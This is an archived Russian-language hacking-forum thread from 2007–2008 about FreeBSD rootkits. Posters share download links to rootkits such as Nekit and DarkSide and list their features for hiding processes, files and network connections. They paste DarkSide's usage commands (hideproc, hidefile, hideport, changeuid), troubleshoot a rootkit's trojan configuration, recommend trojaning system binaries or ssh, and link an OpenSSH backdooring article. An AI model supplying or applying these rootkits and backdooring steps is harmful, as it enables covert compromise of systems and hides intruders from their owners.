ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
02.01.2007, 17:12
|
|
Постоянный
Регистрация: 07.02.2006
Сообщений: 630
Провел на форуме:
12985021
Репутация:
676
|
|
Сообщение от KPOT_f!nd
Но вот может поможет тебе:
Возможно, но только тем чтоб названия посматреть, т.к не одна ссылка там не работает... 
|
|
|
02.01.2007, 17:25
|
|
Познавший АНТИЧАТ
Регистрация: 25.08.2006
Сообщений: 1,524
Провел на форуме:
3405508
Репутация:
1745
|
|
Возможно, но только тем чтоб названия посматреть, т.к не одна ссылка там не работает...
Окей спс за поправку. Вот сам руткит по ОС: freebsd(версия точно не знаю)
Скачать
Вот есть еще под FreeBSD rootkit precompiled binaries for 4.2-RELEASE
Скачать
Последний раз редактировалось KPOT_f!nd; 02.01.2007 в 17:42..
|
|
|
|
05.04.2007, 00:39
|
|
ы
Регистрация: 11.02.2007
Сообщений: 750
Провел на форуме:
1347723
Репутация:
1477
|
|
Сообщение от Nekt
Для фряхи есть, то подкинь буду рад и + с меня Один из посетителей 0x48k.cc под ником suspect поделился с нами информацией следующего характера:
Сообщение от suspect
Давно искал руткит для FreeBSD 5.4 или 6.0, и вот недавно, почти отчаявшись (что придётся писать некое убожество на перле), зарядил гугл и нашёл Nekit!
http://target0.be/dev/nekit/
Сие творение принадлежит товарищу target0 (greets, thanks, etc...)
О нём также упоминается на французком форуме Spirit Of Hack:
http://www.spiritofhack.net/phpBB2/viewtopic.php?t=1474
Но всё бы ничего но я не могу заставить его корректно работать:
Как я понял установка происходит примерно так:
make install load clean
Но позже, заходя под рутом я вообще не вижу ни одного файла (тестил на VMware, возможно влияет, но я сомневаюсь). Кто-нибудь использовал данный руткит? Как его по-человечески поставить?
На форуме кроме greets и небольшого описания бага с параметром -u ничего не нашёл. Автора не тревожил.
Идеи? Пишите.
Ещё не разбирался, но из возможностей руткита стоит отметить:
- сокрытие PID процесса и всех поражденных потомков
- сокрытие файлов/каталогов, реализованное через модификацию данных inode, что позволяет сохранять скрытое состояние даже после перезагрузки системы/выгрузки руткита
- сокрытие соединений
- "пользовательский интерфейс" реализован через дополнительный syscall
и т.д. стандартные функции. Пользуемся наздоровье, спасибо suspect за ссылку.
Позже удалось выяснить что следует тщательно тестировать через ./necall, не делая make install. Стабильностью руткит не отличается, уходит в креш при сокрытии файла на FreeBSD 5.4, процессы скрывает некоторое время (~2 часа), потом также уходит в даун. И снова спасибо suspect'у. Я оттестировать не смог, т.к. спохмела загубил все разделы из Solaris(тестироват SinAR), включая FreeBSD 6.1 и Win XP. Так что звиняйте =) Позже теперь (жду когда придёт бесплатный CD с OpenSolaris =))
__________________
..когда же кто-нибудь выпустит MD5(Unix) брутер на GPU.... жду....
|
|
|
|
05.04.2007, 00:41
|
|
ы
Регистрация: 11.02.2007
Сообщений: 750
Провел на форуме:
1347723
Репутация:
1477
|
|
Меня тут спросили ещё по какие-нибудь руткиты для FreeBSD - рассказываю. От замечательной команды lbyte, которая, к сожалению, уже больше не существует, был такой релиз под названием DarkSide - RootKit для FreeBSD. О нём даже писали в каком-то из старых номеров журнала Хакер. Конечно, маловероятно, что он потянет под 5й и 6й веткой, но попытка не пытка, да и модификацию исходников ещё никто тоже не отменял. Скачать можно здесь: http://lbyte.void.ru/rel/files/darkside-0.2.3.tar.gz
Лично тестировал на FreeBSD 4.6 где-то в 2003 году...
Функционал стандартный:
1)сокрытие процессов и их потомков
2)сокрытие файлов и директорий
3)сокрытие сетевых соединений путём модификасии TCP/IP стека.
Использование:
Код:
hideproc <pid> - скрыть процесс, имеющий PID= <pid>
unhideproc <pid> - показать процесс с PID= <pid>
printprocs - показать все скрытые процессы
changeuid <pid> <uid> - изменить uid процесса с PID= <pid> на <uid>
changeeuid <pid> <euid> - изменить euid процесса с PID= <pid> на <euid>
changegid <pid> <gid> - изменить gid процесса с PID= <pid> на <gid>
changeegid <pid> <egid>- изменить egid процесса с PID= <pid> на <egid>
hidefile <name> - скрыть все файлы с именем <name>
unhidefile <name> - показать все файлы с именем <name>
printfiles - показать вс скрытые файлы
hideport <num> - скрыть все соединения с портом <num>
unhideport <num> - рыскрыть все соединения с портом <num>
hidehost <ip> - скрыть все соединения с <ip>
unhidehost <ip> - раскрыть все соединения <ip>
__________________
..когда же кто-нибудь выпустит MD5(Unix) брутер на GPU.... жду....
|
|
|
|
19.04.2008, 18:26
|
|
Познающий
Регистрация: 18.01.2008
Сообщений: 33
Провел на форуме:
72902
Репутация:
1
|
|
под шестую фряху (release 6) что -то руткит не робит, подскажите может что -то не так делаю,
вообщем запустил скрипт setup, и прописал троя в конфиге /dev/fd/.99/.ttyf00 и /dev/fd/.99/.ttyp00
Последний раз редактировалось MacTep; 20.04.2008 в 11:56..
Причина: Надо юзать кнопку edit
|
|
|
|
20.04.2008, 15:45
|
|
ы
Регистрация: 11.02.2007
Сообщений: 750
Провел на форуме:
1347723
Репутация:
1477
|
|
Сообщение от Free
под шестую фряху (release 6) что -то руткит не робит, подскажите может что -то не так делаю,
вообщем запустил скрипт setup, и прописал троя в конфиге /dev/fd/.99/.ttyf00 и /dev/fd/.99/.ttyp00
Какой именно руткит? Какая версия? Подробности по поводу ветки.
__________________
..когда же кто-нибудь выпустит MD5(Unix) брутер на GPU.... жду....
|
|
|
|
20.04.2008, 17:12
|
|
Познающий
Регистрация: 18.01.2008
Сообщений: 33
Провел на форуме:
72902
Репутация:
1
|
|
рут fbrk, версия 1(fbrk1). Ну есть еще и fbrk2. Вторую пока не пробывал запускать)))
|
|
|
|
20.04.2008, 18:38
|
|
ы
Регистрация: 11.02.2007
Сообщений: 750
Провел на форуме:
1347723
Репутация:
1477
|
|
Сообщение от Free
рут fbrk, версия 1(fbrk1). Ну есть еще и fbrk2. Вторую пока не пробывал запускать)))
Скорее всего fbrk впринципе не заработает. Предлагаю затроянить системные бнарники или ssh, например. Хотя, надо быть аккуратнее ибо способы не супер и требуют особой аккуратности.
__________________
..когда же кто-нибудь выпустит MD5(Unix) брутер на GPU.... жду....
|
|
|
|
20.04.2008, 19:23
|
|
Познающий
Регистрация: 18.01.2008
Сообщений: 33
Провел на форуме:
72902
Репутация:
1
|
|
в качестве системных бинарников ты имеешь в виду каталог /etc/
|
|
|
|
23.04.2008, 10:18
|
|
Постоянный
Регистрация: 03.02.2007
Сообщений: 520
Провел на форуме:
1777536
Репутация:
932
|
|
Free
Читай: hellknights.void.ru/articles/0x48k-OpenSSH-backdooring.html
От себя добавлю:
forum.antichat.ru/thread62167.html
|
|
|
|
|
|
|
Похожие темы
|
| Тема |
Автор |
Раздел |
Ответов |
Последнее сообщение |
|
xBSD books
|
FRAGNATIC |
*nix |
20 |
22.04.2008 18:02 |
|
FreeBSD 4.11
|
DimaHbl4 |
Болталка |
0 |
21.06.2006 13:07 |
|
Пароли в FreeBSD
|
LittleLamer |
АнтиАдмин |
1 |
21.12.2004 09:39 |
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
